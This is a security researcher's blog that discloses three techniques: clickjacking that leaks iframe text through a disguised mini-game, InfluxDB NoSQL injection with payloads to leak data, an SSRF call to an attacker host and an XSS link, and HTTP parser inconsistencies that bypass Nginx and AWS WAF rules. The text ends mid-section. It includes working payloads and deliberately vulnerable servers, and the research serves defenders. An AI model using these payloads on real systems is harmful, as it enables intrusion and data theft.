Rafa's Security Researches

AuxClickjacking

Rafael da Costa Santos — Mon, 17 Nov 2025 22:24:36 GMT

In this small and fun research, I will show how I developed a Clickjacking technique that leaks iframe contents by prompting the user to perform a click and drag + middle mouse button (wheel) click. I’m not sure if it’s already being exploited, but for now, I’m calling this AuxClickjacking.

Select Text + Wheel Click

One day, I accidentally discovered a very useful feature in modern browsers: if you select some text and then middle-click on any field or tab, the selected text is pasted there. I used this feature frequently, until one day I wondered whether the behavior could be abused.

Iframe Abuse

The first thing I wanted to test was whether iframe content could be copied using this feature, and unsurprisingly, it worked:

I also noticed that an iframe with near-zero opacity can still be copied, which already hints at a potential clickjacking-like scenario.

Next, I wondered: “What if I simulate a click-and-drag interaction, but place a hidden iframe underneath, will its content be copied?”
The answer is no: modern browsers enforce a strict sandbox here. If you try selecting text across both the parent page and a hidden iframe, only the first source in the selection (the parent window) is actually copied.

So the real question became: “What if I can make the iframe the first source of the selection?”
And that’s how I came up with the idea to build an exploit inspired by click-and-drag mechanics used in many web-based games.

The Billiards Game

In this example, I’m leaking the contents of https://example.com: https://clickjacking1337.s3.us-east-1.amazonaws.com/index.html.

The core idea behind this exploit is to trick the user into performing a click-and-drag interaction to “shoot” the ball into the pocket. Visually, the user believes they are interacting with a simple billiards-style mini-game:

However, behind the scenes, the user is actually clicking and dragging over a hidden <iframe>, and to perform the “shot”, the game requires a middle-mouse (wheel) click, which will paste the iframe contents into our page. When the user drags the ball, they are unknowingly selecting the entire contents of the iframe, due to the automatic scrolling caused by the iframe’s constrained height.

The main limitation of this technique is that the first drag attempt fails because the initial interaction still happens inside the iframe’s DOM context. Fortunately, this behavior is detectable: once the iframe receives focus, the parent page triggers an onblur event, which allows the parent page to know if the iframe contents were copied or not. After the onblur event, the exploit can remove the iframe, leaving the user with a fully functional game interface while the selection event has already occurred. This way, the user will only think that it was a small bug in the game, and life goes on.

Below is a demonstration of how the exploit operates internally:

And here is what a real exploitation attempt looks like in practice:

Explaining Parts Of The Exploit Code

The iframe must have scrolling="yes" and a limited height. This way, the browser auto-scrolls while the user drags, so the selection quickly covers the entire page.
I’m using width="10000000" on the iframe element to keep the vertical scrollbar out of reach. Otherwise, the user might grab the scrollbar instead of selecting the iframe content.
The iframe opacity needs to be near zero, low enough to be invisible on the page: opacity:0.01;.

To leak the page data with the middle mouse button click, I create an input element and attach a mouseup listener to it. This way, I can read the pasted data:

 shotButton = document.createElement("input");
 shotButton.value = "Shoot Ball";
 /*More code*/
 shotButton.addEventListener("mouseup", (e) => {
     if (e.button === 1) {
         arrowCanvas.style.opacity = 0;
         launchBall();
         setTimeout(function(){
             document.getElementById("message-content").innerText = "Leaked Data :: " + shootball.value
             shootball.value = "Shoot Ball"
             shotButton.remove();
             shotButton = null;
         }, 1);
     }
 });

To detect if the iframe contents were already copied, I’m using the following code:

 window.addEventListener("blur", () => {
   setTimeout(function(){
     iframeElem.hidden="true" // Prevents the iframe element from being selected.
   }, 600)
 });

Conclusion

This technique works in both Chrome and Firefox, and I can honestly say I would fall for it myself in a browser game.

InfluxDB NoSQL Injection

Rafael da Costa Santos — Thu, 17 Aug 2023 11:43:33 GMT

In this post, I'll share my experience of discovering a NoSQL Injection vulnerability in a Bug Bounty program. The target used a database that gets little attention within the hacking community.

During the initial discovery, I was expecting to find a good blog post or tool teaching how to exploit NoSQL Injection on InfluxDB, but this was not the case, so I needed to understand how this database works to develop payload techniques to leak data from it.

Furthermore, I'll explain how I took advantage of it to find an XSS and SSRF.

What is InfluxDB

InfluxDB is a popular open-source time series database that is designed for handling high volumes of timestamped data. InfluxDB is widely used for monitoring and analyzing metrics, events, and real-time data from various sources such as sensors, applications, and IoT devices.

Initial Vulnerability Discovery

While analyzing the web application, I received the following error after sending the character " in a query parameter of the URL:

error @1:115-1:118: got unexpected token in string expression @1:118-1:118: EOF

This looked a lot like an injection issue, and after searching on Google, I concluded that the backend was using InfluxDB.

At this point, I started reading the documentation (https://docs.influxdata.com/influxdb/v2.7/) to figure out what was happening in the backend.

InfluxDB NoSQL Queries

This is a simple example of an InfluxDB NoSQL query:

from(bucket: "example-bucket")
    |> range(start: -1h)
    |> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag")

The given InfluxDB query retrieves data from the "example-bucket" within the last hour and filters the data based on specific conditions.

Here's a breakdown of each part of the query:

from(bucket: "example-bucket"): This part specifies the source bucket from which the data will be retrieved. InfluxDB organizes data into buckets, and here, the data will be fetched from the "example-bucket." Buckets are like database names in SQL languages.
|> range(start: -1h): This part sets the time range for the data retrieval. The range function is used to define a time window. In this case, it specifies the last hour of data from the current time. The parameter start: -1h means the data will be fetched from one hour ago until the current time.
|> filter(fn: (r) => r._measurement == "example-measurement" and r.tag == "example-tag"): This part applies a filter to the data based on certain conditions. The filter function is used to select specific data points that meet the defined criteria. The filter() performs operations similar to the SELECT statement and the WHERE clause in SQL-like languages.

In summary, the query fetches data from the "example-bucket" within the last hour and filters the data to include only those data points that belong to the measurement "example-measurement" and have a tag with the key "tag" and value "example-tag."

Building a Vulnerable WEB Application

Now that we know the syntax, it's time to build our own vulnerable application, so we can develop a proof of concept that also works against real-world applications.

The following code is a vulnerable server example:

const express = require('express');
const {InfluxDB, Point} = require('@influxdata/influxdb-client')

const app = express();

const token = 'REDACTED' // InfluxDB Token
const url = 'https://127.0.0.1' // Local Database endpoint
const org = 'myOrg'
const bucket = 'publicBucket'

const client = new InfluxDB({url, token})

// Runs a Flux query and collects every returned row as a plain object.
async function query(fluxQuery) {
  const results = []

  const queryApi = client.getQueryApi(org)

  for await (const {values, tableMeta} of queryApi.iterateRows(fluxQuery)) {
    const o = tableMeta.toObject(values)
    console.log(o)
    results.push(o)
  }

  return results
}

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

const port = 3000;

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});

In the above example, the server is concatenating a user-supplied input at ' + req.query.data + ' to the InfluxDB query without any sanitization:

const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
result = await query(fluxQuery)

By sending an HTTP request containing the character ", which closes the string literal in the query early, we can confirm that the server returns the same error previously seen on the Bug Bounty program's server:

Building The Payload

Leaking Bucket Names

As mentioned earlier, bucket names in InfluxDB are like database names in SQL databases. As in an SQL Injection exploitation process, it's crucial to find a way to leak these bucket names to get access to the entire database.

After carefully reading the documentation, and assuming that the injection occurs inside the filter function, I arrived at the following error-based NoSQL Injection payload:

") |> yield(name: "1337") 
buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) 
//

The buckets() function lists all the buckets from the current database.
The filter() function uses the expression r.name to filter on bucket names, where r is a row returned by the buckets() query and name is one of the fields in that row.
As you can see, the InfluxDB queries support regex with the =~ operation, so the logic behind the condition r.name =~ /^a.*/ is that it will be true if a bucket name starts with the letter a.
After that, the filter uses a and condition that calls the die() function with the value of the bucket name as a parameter. The die() function throws an error with a custom message passed in the first parameter, which will leak the bucket name.
The payload is also using the yield() function before the buckets query. This is necessary to perform "multiple queries" in a single request on InfluxDB.
Finally, it's necessary to separate the yield() from the buckets query with a new line, and at the end of the payload, I added the // expression after another new line to comment everything after our injection.
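To make the effect of the payload easier to see, here is a minimal Python sketch that mirrors the string concatenation done by the example server and prints the Flux query the database would receive. The helper name build_flux_query is hypothetical; only the concatenation pattern and the payload come from the text above.

```python
BUCKET = "publicBucket"  # same bucket name as the example server


def build_flux_query(data: str) -> str:
    """Mirror the vulnerable concatenation from the example server (no sanitization)."""
    return (
        'from(bucket:"' + BUCKET + '") |> range(start: 0)  |> filter(fn: (r) => '
        'r._field == "public_field" and r._value == "' + data + '") '
    )


# The bucket-leak payload: close the string and the filter, yield the first
# query, start a second query on a new line, then comment out the leftovers.
PAYLOAD = (
    '") |> yield(name: "1337") \n'
    'buckets() |> filter(fn: (r) => r.name =~ /^a.*/ and die(msg:r.name)) \n'
    '//'
)

query = build_flux_query(PAYLOAD)
print(query)
```

The printed query has three lines: the original query closed early and ended with yield(), the injected buckets() query, and a comment line that swallows the trailing ") left over from the server's template.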

In summary, if a bucket whose name starts with the letter a exists in the database, the die() function is triggered and leaks the bucket name in the error message. If no bucket starts with the tested letter, the server returns an empty output with no errors.

Trying it on our vulnerable application, we can see that no error is returned with the letter a:

But sending the same payload with the letter p leaks the bucket name privateBucket:

To leak all bucket names, it's necessary to test every character and then extend each matching prefix with another character (for example pa, pb, pc ...).
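The prefix-extension idea can be sketched as a small recursive search. This is only an illustration under assumptions: the oracle below is a local stand-in that simulates the error-based leak (it returns the first name matching the regex, or None for an empty response), the alphabet is a guess, and no request is sent anywhere.

```python
import re
import string
from typing import Callable, List, Optional, Set

# Assumed alphabet for bucket names; adjust it for the real target.
ALPHABET = string.ascii_letters + string.digits + "_-"


def enumerate_names(oracle: Callable[[str], Optional[str]], prefix: str = "") -> Set[str]:
    """Collect every name reachable by extending prefixes that trigger a leak."""
    leaked = oracle(prefix)
    if leaked is None:  # empty response: nothing starts with this prefix
        return set()
    found = {leaked}
    for ch in ALPHABET:  # pa, pb, pc, ... as described in the text
        found |= enumerate_names(oracle, prefix + ch)
    return found


def make_fake_oracle(buckets: List[str]) -> Callable[[str], Optional[str]]:
    """Simulate the die() leak: return the first bucket matching ^prefix.*"""
    def oracle(prefix: str) -> Optional[str]:
        pattern = re.compile("^" + re.escape(prefix) + ".*")
        for name in buckets:
            if pattern.search(name):
                return name
        return None
    return oracle


names = enumerate_names(make_fake_oracle(["publicBucket", "privateBucket", "_monitoring"]))
print(sorted(names))
```

Each matching prefix leaks only one name, so the search keeps extending prefixes until nothing matches. In a real test, the oracle would send the payload and parse the error message instead.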

Leaking The Bucket Field Names

Now that we have the names of the buckets we can try to fetch their contents, but like other SQL languages, sometimes we need to specify the column names to query specific data, and in this section, I will show a technique to leak these column names in InfluxDB.

During dynamic analysis, I was able to find a payload that triggers an error containing the data structure of any bucket:

") |> yield(name: "1337") 
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => die(msg:r)) 
 //

The above payload uses a similar technique, using the yield() function and adding a comment at the end of the payload:

The payload now uses the from() function to fetch the data of the leaked bucket name, the range() which is necessary, and finally the filter().
In the filter() function, I called die() again, but now passing the entire result object as a parameter. Since the die() function only accepts strings and the result object carries the whole data structure of the bucket, the server triggers a verbose error that leaks it.

As you can see in the above screenshot, the server leaked this structure:

_value: B,
_time: time,
_stop: time,
_start: time,
_measurement: string,
_field: string

Now that we know the query structure, we can use a regex comparison to force an error to leak all field names:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field =~ /s.*/ and die(msg:r._field))
 //

As we can see, the vulnerable app leaked the field name sensitive_field because it matched the regex condition r._field =~ /s.*/.

Leaking Field Values

After leaking all field names, we can try to leak field values. Field values are the "final node" of InfluxDB: they are where the data is actually stored, so leaking them is the last step of the exploitation. To do that, we can use the same technique used to leak the field names, but now specifying the field that we want to retrieve:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:r._value))
 //

By sending the above payload, the server responded with an error:

HttpError: runtime error @2:54-2:124: filter: type conflict: string != int

This occurs because the data stored on r._value is an integer and the die() function only accepts strings. To circumvent that, we can use the string() function to convert the integer value to a string, successfully leaking it in the error message:

") |> yield(name: "1337")
 from(bucket: "privateBucket") |> range(start: 0) |> filter(fn: (r) => r._field == "sensitive_field" and die(msg:string(v:r._value)))
 //

As we can see in the above screenshot, the value of the sensitive_field is 1337. This means that we were able to fetch arbitrary data from other buckets!

InfluxDB Server-Side Request Forgery

While reading the documentation I noticed that some InfluxDB functions accept a host parameter, one of these functions is from():

By sending the host parameter in the from() function we can make HTTP requests to arbitrary URLs. The following payload is an example of an SSRF using the NoSQL Injection vulnerability:

") |> yield(name: "1337")
 from(bucket: "1337", host:"https://ATTACKER-SERVER") |> range(start:0)
 //

And this is the request received by my Burp Collaborator:

If the vulnerable application is using a local InfluxDB database, it's also possible to fetch internal endpoints.

This is not a vulnerability in InfluxDB. It is a legitimate feature being abused through a NoSQL Injection that stems from an insecure coding practice.

InfluxDB Cross-Site Scripting

Our example server is also prone to Reflected XSS attacks via the NoSQL Injection:

app.get('/query', async (req, res) => {
    try {
      const fluxQuery = 'from(bucket:"' + bucket + '") |> range(start: 0)  |> filter(fn: (r) => r._field == "public_field" and r._value == "' + req.query.data + '") '
      result = await query(fluxQuery)

      res.send(result)
    } catch (err) {
      res.send(err.toString())  
    }
});

If you have an XSS radar like me, you'll notice that when an error occurs in the InfluxDB query, the catch block sends the error back to the client with the Content-Type set to text/html, allowing the browser to render HTML and execute JavaScript.

Furthermore, we can control some data that is reflected in these errors, especially via the die() function:

Since the query API uses the GET method, it's possible to execute arbitrary JavaScript on the victim's browsers by sending a malicious link:

http://127.0.0.1:3000/query?data=%22)%20die(msg%3a%22%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e%22)%2f%2f

") die(msg:"<img src=x onerror=alert(document.domain)>")//

This is not an InfluxDB vulnerability: the issue arises from a NoSQL Injection caused by an insecure coding practice, combined with the text/html Content-Type that Express's res.send() applies to string responses by default.
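To double-check what the malicious link shown earlier actually injects, the data parameter can be decoded with Python's standard urllib.parse module. This is just a small verification sketch; the LINK constant is the URL from this section.

```python
from urllib.parse import parse_qs, urlsplit

# The malicious link from this section.
LINK = (
    "http://127.0.0.1:3000/query?data=%22)%20die(msg%3a%22%3cimg%20src%3dx"
    "%20onerror%3dalert(document.domain)%3e%22)%2f%2f"
)

# parse_qs percent-decodes the value, giving the raw string that the server
# concatenates into the Flux query.
payload = parse_qs(urlsplit(LINK).query)["data"][0]
print(payload)
```

The decoded value closes the filter, calls die() with an HTML string as the message, and comments out the rest of the query, so the HTML ends up inside the reflected error.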

Conclusion

In this blog post, I described how I developed an exploit for a NoSQL Injection vulnerability in a database that gets little attention within the hacking community, and how I leveraged this issue to achieve an SSRF and an XSS.

Exploiting HTTP Parsers Inconsistencies

Rafael da Costa Santos — Sat, 17 Jun 2023 17:25:25 GMT

The HTTP protocol plays a vital role in the seamless functioning of web applications. However, the implementation of HTTP parsers across different technologies can introduce subtle discrepancies, leading to potential security loopholes.

In this research, my focus revolves around the discovery of inconsistencies within HTTP parsers across various web technologies, including load balancers, reverse proxies, web servers, and caching servers. By investigating these disparities, I aim to shed light on potential new vulnerabilities that involve HTTP Desync attacks.

This was my first security research project. I started this journey in December 2021 and concluded it in April 2022. I tried to be creative in finding new attack vectors caused by incorrect HTTP parsing. In this post, I will share the final results of this study.

Pathname Manipulation: Bypassing Reverse Proxies and Load Balancers Security Rules

This section of the research focuses on the exploitable vulnerabilities arising from pathname manipulation in web servers, mainly through the use of trim() or strip() functions. By exploiting these techniques, attackers can circumvent security rules specific to certain paths in reverse proxies and load balancers, posing a significant threat to web application security.

In this section, we delve into the intricacies of how web servers process and manipulate pathnames, investigating the impact of the removal of certain characters, which can lead to unintended behaviors.

Nginx ACL Rules

Nginx is a powerful web server and reverse proxy which allows developers to apply security rules on HTTP requests. This section explores security threats related to Nginx's ability to rewrite or block HTTP messages, with a primary focus on rules triggered by specific strings or regular expressions found within the HTTP pathname section.

In Nginx, the "location" rule enables developers to define specific directives and behaviors based on the requested URL. This rule acts as a key component in routing and processing incoming HTTP requests, allowing control over how different URLs are handled.

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

The above Nginx rule aims to deny every access to the /admin endpoint, so if a user tries to access this endpoint, Nginx will return 403 and will not pass the HTTP message to the web server.

To prevent security issues on URI-based rules, Nginx performs path normalization before checking them. Path normalization in Nginx refers to the process of transforming and standardizing requested URLs to a consistent and canonical format before handling them. It involves removing redundant or unnecessary elements from the URL path, such as extra slashes, dot segments, processing path traversal, and URL-encoded characters, to ensure uniformity and proper routing within the web server.

Trim Inconsistencies

Before we proceed, we need to understand what the trim() function does in different languages.

Different languages remove different characters when their equivalent of trim() is called, so each server normalizes the pathname according to its own trim() and removes a different set of characters. Nginx, which is written in C, does not account for all of the characters removed by every language.

E.g.: Python removes the character \x85 with strip(), and JavaScript does not with trim().

If an HTTP message is parsed using the trim() function in different languages, an HTTP Desync attack can occur.
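The difference is easy to observe from Python itself. The sketch below compares Python's str.strip() with the ASCII-only whitespace set that C's isspace() recognizes in the default "C" locale. That set is used here only as a stand-in for a narrower notion of whitespace; the sketch does not reproduce the internals of Nginx or of any framework.

```python
# Whitespace recognized by C's isspace() in the default "C" locale.
C_ISSPACE = set(" \t\n\v\f\r")

# Characters discussed in this research.
CANDIDATES = ["\x85", "\xa0", "\x1f", "\x1e", "\x1d", "\x1c", "\x0c", "\x0b", "\x09"]


def stripped_by_python(ch: str) -> bool:
    """True when str.strip() removes the character from the end of a path."""
    return ("/admin" + ch).strip() == "/admin"


# Characters that Python strips but that fall outside the ASCII-only set.
python_only = [ch for ch in CANDIDATES if stripped_by_python(ch) and ch not in C_ISSPACE]

for ch in CANDIDATES:
    print(f"\\x{ord(ch):02x} python_strip={stripped_by_python(ch)} c_isspace={ch in C_ISSPACE}")
```

Every character in the list is removed by str.strip(), while several of them, including \x85 and \xa0, are not whitespace under the ASCII-only definition. Two components that disagree in this way will see different pathnames for the same request.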

Bypassing Nginx ACL Rules With Node.js

Let's consider the following Nginx ACL rule and Node.js API source code using Express:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

app.get('/admin', (req, res) => {
    return res.send('ADMIN');
});

Following the trim() logic, Node.js "ignores" the characters \x09, \xa0, and \x0c from the pathname, but Nginx considers them as part of the URL:

First, Nginx receives the HTTP request and performs path normalization on the pathname;
As Nginx includes the character \xa0 as part of the pathname, the ACL rule for the /admin URI will not be triggered. Consequently, Nginx will forward the HTTP message to the backend;
When the URI /admin\xa0 is received by the Node.js server, the character \xa0 will be removed, allowing successful retrieval of the /admin endpoint.
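The three steps above can be modeled in a few lines of Python. This is a simplified model under assumptions, not real Nginx or Express code: proxy_forwards imitates the exact-match location rules, and backend_route imitates a backend that drops the characters the text reports Node.js ignoring. Both function names are hypothetical.

```python
DENIED_EXACT = {"/admin", "/admin/"}  # the two `location =` rules
NODE_IGNORED = "\x09\xa0\x0c"         # characters the text reports Node.js ignoring


def proxy_forwards(path: str) -> bool:
    """Exact matching: only paths identical to a rule are denied."""
    return path not in DENIED_EXACT


def backend_route(path: str) -> str:
    """Model of the backend: ignored characters at the end of the path are dropped."""
    return path.rstrip(NODE_IGNORED)


def reaches_admin(path: str) -> bool:
    """True when the proxy forwards the request and the backend routes it to /admin."""
    return proxy_forwards(path) and backend_route(path) == "/admin"


print(reaches_admin("/admin"))      # blocked by the proxy
print(reaches_admin("/admin\xa0"))  # forwarded, then routed to /admin
```

The bypass exists only because the two functions disagree about which paths are equivalent to /admin.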

Below is a graphical demonstration of what happens with the HTTP request:

To gain a clearer understanding of how this vulnerability can be exploited, I recommend watching the accompanying proof of concept video below:

https://www.youtube.com/watch?v=sgs3s5oTfz8

Below is a table correlating Nginx versions with characters that can potentially lead to bypassing URI ACL rules when using Node.js as the backend:

Nginx Version	Node.js Bypass Characters
1.22.0	`\xA0`
1.21.6	`\xA0`
1.20.2	`\xA0`, `\x09`, `\x0C`
1.18.0	`\xA0`, `\x09`, `\x0C`
1.16.1	`\xA0`, `\x09`, `\x0C`

Bypassing Nginx ACL Rules With Flask

Flask removes the characters \x85, \xA0, \x1F, \x1E, \x1D, \x1C, \x0C, \x0B, and \x09 from the URL path, but NGINX doesn't.

Take the following nginx configuration/API source code as a reference:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

@app.route('/admin', methods = ['GET'])
def admin():
    data = {"url":request.url, "admin":"True"}

    return Response(str(data), mimetype="application/json")

As you can see below, it's possible to circumvent the ACL protection by adding the character \x85 at the end of the pathname:

Nginx Version	Flask Bypass Characters
1.22.0	`\x85`, `\xA0`
1.21.6	`\x85`, `\xA0`
1.20.2	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`
1.18.0	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`
1.16.1	`\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B`

Bypassing Nginx ACL Rules With Spring Boot

Spring removes the characters \x09 and \x3B from the URL path, but Nginx doesn't.

Take the following Nginx configuration/API source code as a reference:

location = /admin {
    deny all;
}

location = /admin/ {
    deny all;
}

@GetMapping("/admin")
public String admin() {
    return "Greetings from Spring Boot!";
}

Below, you will find a demonstration of how ACL protection can be circumvented by adding the character \x09 (\t) or ; at the end of the pathname:

Nginx Version	Spring Boot Bypass Characters
1.22.0	`;`
1.21.6	`;`
1.20.2	`\x09`, `;`
1.18.0	`\x09`, `;`
1.16.1	`\x09`, `;`

Bypassing Nginx ACL Rules With PHP-FPM Integration

PHP-FPM (FastCGI Process Manager) is a robust and high-performance PHP FastCGI implementation that works seamlessly with Nginx. It serves as a standalone server for handling PHP requests, improving the speed and efficiency of PHP execution. Nginx acts as a reverse proxy, receiving incoming HTTP requests and passing them to PHP-FPM for processing.

Let's consider the following Nginx FPM configuration:

location = /admin.php {
    deny all;
}

location ~ \.php$ {
    include snippets/fastcgi-php.conf;
    fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}

When the request pathname contains two .php files, PHP matches the first one and ignores everything after the slash that follows it. Since Nginx is configured to block only the exact endpoint /admin.php, it's possible to reach the admin.php file with a request such as /admin.php/index.php:

Below is a graphical example of how the applications interpret the HTTP request:

This technique only works if the second PHP file, in this case, index.php, exists in the server structure. Take the following server code/structure as a reference:

These behaviors were reported to the Nginx security team in 2022, and they responded that they did not consider them to be their responsibility.

Since the research concluded in April 2022, newer versions of Nginx were not specifically tested. However, it is highly likely that the findings and vulnerabilities identified in the research are reproducible in the latest version of Nginx as well.

How to prevent

To prevent these issues, use the ~ (regular expression) modifier instead of the = (exact match) modifier in Nginx ACL rules, for example:

location ~* ^/admin {
    deny all;
}

The ~* modifier makes Nginx treat the location as a case-insensitive regular expression, and ^/admin matches every pathname that begins with /admin. In other words, if a user sends a request to /admin1337, the request will also be blocked.
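As a quick sanity check of the rule, the same pattern can be tried with Python's re module. Python's regex engine is not the one Nginx uses, but for a pattern this simple the behavior is the same. The is_denied helper is hypothetical.

```python
import re

# Equivalent of `location ~* ^/admin`: case-insensitive and anchored at the start.
ADMIN_RULE = re.compile(r"^/admin", re.IGNORECASE)


def is_denied(path: str) -> bool:
    """True when the path would fall under the deny rule."""
    return ADMIN_RULE.search(path) is not None


for path in ["/admin", "/admin/", "/admin\xa0", "/ADMIN\x85", "/admin1337", "/public/admin", "/"]:
    print(repr(path), is_denied(path))
```

Because the rule only looks at the beginning of the pathname, trailing characters such as \xa0 or \x85 no longer let a request slip past it. The trade-off is that unrelated endpoints sharing the /admin prefix are blocked too.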

Bypassing AWS WAF ACL

How AWS WAF ACLs Work

AWS ACL (Access Control List) rules are a component of load balancers, providing control over incoming and outgoing network traffic. These rules define access permissions based on specified conditions, allowing or denying requests to and from the load balancer.

You can configure the AWS Web Application Firewall (WAF) ACL to examine and validate HTTP headers. AWS WAF ACL rules allow you to define conditions based on specific header attributes or values, enabling you to control and filter incoming requests.

Header ACL example:

In the above example, if a request contains a SQL Injection payload in the X-Query header, AWS WAF recognizes the SQL Injection attempt and responds with a 403 Forbidden HTTP status code. This prevents the request from being forwarded to the backend, effectively blocking any potential exploitation of the application's database through SQL Injection attacks.

As you can see, the above request carried the payload ' or '1'='1' -- at the X-Query header, and then was blocked by the AWS WAF.

Bypassing AWS WAF ACL With Line Folding

Web servers such as Node.js, Flask, and many others support a legacy HTTP feature known as "line folding", which the HTTP/1.1 specification has since deprecated. Line folding splits a long header value across multiple lines, where each continuation line starts with \x09 (tab) or \x20 (space). Because intermediaries and backends do not all handle folded headers the same way, this behavior can lead to compatibility issues and security vulnerabilities.

For example, the header 1337: Value\r\n\t1337 in the following request will be interpreted as 1337: Value\t1337 in the Node.js server:

GET / HTTP/1.1
Host: target.com
1337: Value
    1337
Connection: close

Knowing it, I discovered that it's possible to bypass the AWS WAF by using line folding behavior.

Using the same AWS WAF that protects the X-Query from SQL Injection payloads, the following HTTP request was used to confirm that the Node.js server received the payload ' or '1'='1' -- in the X-Query header.

Below is a graphical example of how the applications interpret the HTTP request header with line folding:

For the exploitation scenario, let's take the following Node.js source code as a reference. It returns the request headers as JSON:

app.get('/*', (req, res) => {
    res.send(req.headers);
});

Below is an example of an exploitation request:

GET / HTTP/1.1\r\n
Host: target.com\r\n
X-Query: Value\r\n
\t' or '1'='1' -- \r\n
Connection: close\r\n
\r\n

In the provided screenshot, it is evident that the Node.js application interpreted the characters ' or '1'='1' -- as the value for the X-Query header. However, the AWS WAF treated it as a header name instead.
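The disagreement between the two components can be reproduced with two toy header parsers in Python. Both are hypothetical models written for this illustration and are not the actual parsers of AWS WAF or Node.js: one treats every line as an independent header, the other joins continuation lines onto the previous header value.

```python
RAW_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: target.com\r\n"
    "X-Query: Value\r\n"
    "\t' or '1'='1' -- \r\n"
    "Connection: close\r\n"
    "\r\n"
)


def header_lines(raw: str) -> list:
    """Return the header lines, skipping the request line."""
    head = raw.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")[1:]


def parse_without_folding(raw: str) -> dict:
    """Every line is its own header; a line without ':' becomes a bare name."""
    headers = {}
    for line in header_lines(raw):
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def parse_with_folding(raw: str) -> dict:
    """Lines starting with space or tab continue the previous header value."""
    headers = {}
    last = None
    for line in header_lines(raw):
        if line[:1] in (" ", "\t") and last is not None:
            headers[last] += line.rstrip()
            continue
        name, _, value = line.partition(":")
        last = name.strip()
        headers[last] = value.strip()
    return headers


print(parse_without_folding(RAW_REQUEST)["X-Query"])
print(repr(parse_with_folding(RAW_REQUEST)["X-Query"]))
```

The first parser sees X-Query with the harmless value Value, plus a separate header whose name is the payload. The second parser sees the payload as part of the X-Query value. A filter that inspects header values with the first view will miss what the backend receives with the second.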

This bypass technique was reported to the AWS security team and fixed in 2022.

Incorrect Path Parsing Leads to Server-Side Request Forgery

In the previous sections, I provided reasons to be cautious about trusting reverse proxies. However, in this section, I will demonstrate why utilizing a reverse proxy can be advantageous...

In this section, I will leverage an incorrect pathname interpretation to exploit a Server-Side Request Forgery vulnerability in popular servers and frameworks such as Spring Boot, Flask, and PHP.

Normally, a valid HTTP pathname starts with / or http(s)://domain/, but the majority of popular web servers do not verify this correctly, which can lead to a security risk.

SSRF on Flask Through Incorrect Pathname Interpretation

Flask is a lightweight web framework for Python, and it offers a straightforward and flexible approach to web development.

After conducting tests on Flask's pathname parsing, I discovered that it accepts certain characters that it shouldn't. As an example, the following HTTP request, which should be considered invalid, is surprisingly treated as valid by the framework, but the server responds 404 Not Found:

GET @/ HTTP/1.1
Host: target.com
Connection: close

While investigating how this behavior can potentially result in a security vulnerability, I came across a helpful Medium blog post that demonstrates the creation of a proxy using the Flask framework. Below is an example of the code provided in the blog post:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
  return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

My first thought was: "What if the developer forgets to add the last slash in the SITE_NAME variable?". And yes, it can lead to an SSRF.

Since Flask also allows any ASCII character after the @, it's possible to fetch an arbitrary domain after concatenating the malicious pathname and the destination server.
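Why the missing slash matters can be checked with Python's standard URL parser. In this small sketch, upstream_host is a hypothetical helper that repeats the same f-string concatenation as the proxy and reports which host the resulting URL points to.

```python
from urllib.parse import urlsplit


def upstream_host(site_name: str, path: str) -> str:
    """Concatenate like the proxy does and return the host of the resulting URL."""
    return urlsplit(f"{site_name}{path}").hostname


# Without the trailing slash, everything before "@" is parsed as userinfo.
print(upstream_host("https://google.com", "@evildomain.com/"))

# With the trailing slash, the same input stays inside the path.
print(upstream_host("https://google.com/", "@evildomain.com/"))
```

In the first case the URL becomes https://google.com@evildomain.com/, where google.com is only the userinfo part and the request goes to evildomain.com. In the second case the host remains google.com.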

Please consider the following source code as a reference for the exploitation scenario:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
  return get(f'{SITE_NAME}{path}').content

if __name__ == "__main__":
    app.run(threaded=False)

Presented below is an example of an exploitation request:

GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

In the following example, I was able to fetch my EC2 metadata:

SSRF on Spring Boot Through Incorrect Pathname Interpretation

Upon discovering the presence of an SSRF vulnerability in Flask, I delved into exploring how this behavior could be exploited in other frameworks. As my research progressed, it became apparent that Spring Boot is also susceptible to this particular issue.

Authentication bypasses, ACL bypasses, and path traversal are known vectors when the application parses Matrix parameters. Servlet matrix parameters are a feature introduced in the Servlet specification that allows you to extract and handle additional data present in the URL path. Unlike query parameters that are separated by the ? character, matrix parameters are separated by the ; character within the URL.

During the research, I discovered that the Spring framework accepts the matrix parameter separator character ; before the first slash of the HTTP pathname:

GET ;1337/api/v1/me HTTP/1.1
Host: target.com
Connection: close

If a developer implements a server-side request that utilizes the complete pathname of the request to fetch an endpoint, it can lead to the emergence of Server-Side Request Forgery (SSRF).

Please consider the following source code as a reference for the exploitation scenario:

